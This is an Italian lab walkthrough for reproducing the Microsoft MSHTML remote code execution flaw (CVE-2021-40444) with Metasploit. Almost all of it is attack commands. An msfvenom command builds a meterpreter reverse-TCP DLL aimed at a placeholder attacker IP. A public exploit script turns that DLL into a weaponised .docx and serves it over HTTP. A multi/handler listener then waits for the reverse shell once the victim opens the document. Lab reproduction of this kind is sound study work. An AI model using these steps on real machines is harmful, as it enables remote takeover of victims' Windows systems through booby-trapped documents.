
Un tentativo di riprodurre la vulnerabilità Remote Code Execution (RCE) di Microsoft MSHTML e di utilizzare il Metasploit Framework.
Un tentativo di riprodurre la vulnerabilità di esecuzione remota di codice (RCE) di Microsoft MSHTML utilizzando Metasploit Framework.
funziona meglio se non eseguito in FlareVM
Clona il repository da https://github.com/lockedbyte/CVE-2021-40444
Prepara il template .dll da utilizzare successivamente con msfvenom
msfvenom -p windows/meterpreter/reverse_tcp lhost=<SOURCE_IP> lport=<LISTENING_PORT> -f dll -o template.dll
Copia il template.dll appena generato nella cartella test/ del repository
Dai il permesso di esecuzione al template.dll con chmod +x template.dll
Esegui lo script per elaborare il template.dll in output
python3 exploit.py generate ~/test/template.dll http://<SOURCE IP>
Il documento verrà quindi esportato nella cartella out/ e possiamo creare un listener sulla nostra porta HTTP (predefinita: 80)
python3 exploit.py host 80
Esegui Metasploit con
msfconsole -q
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost <SOURCE IP>
run
Quindi possiamo inviare il document.docx alla nostra macchina vulnerabile ed eseguire il .docx
Otterremo una risposta nel terminale di exploit.py e il lab avrà esito positivo se riusciamo a generare una shell TCP inversa.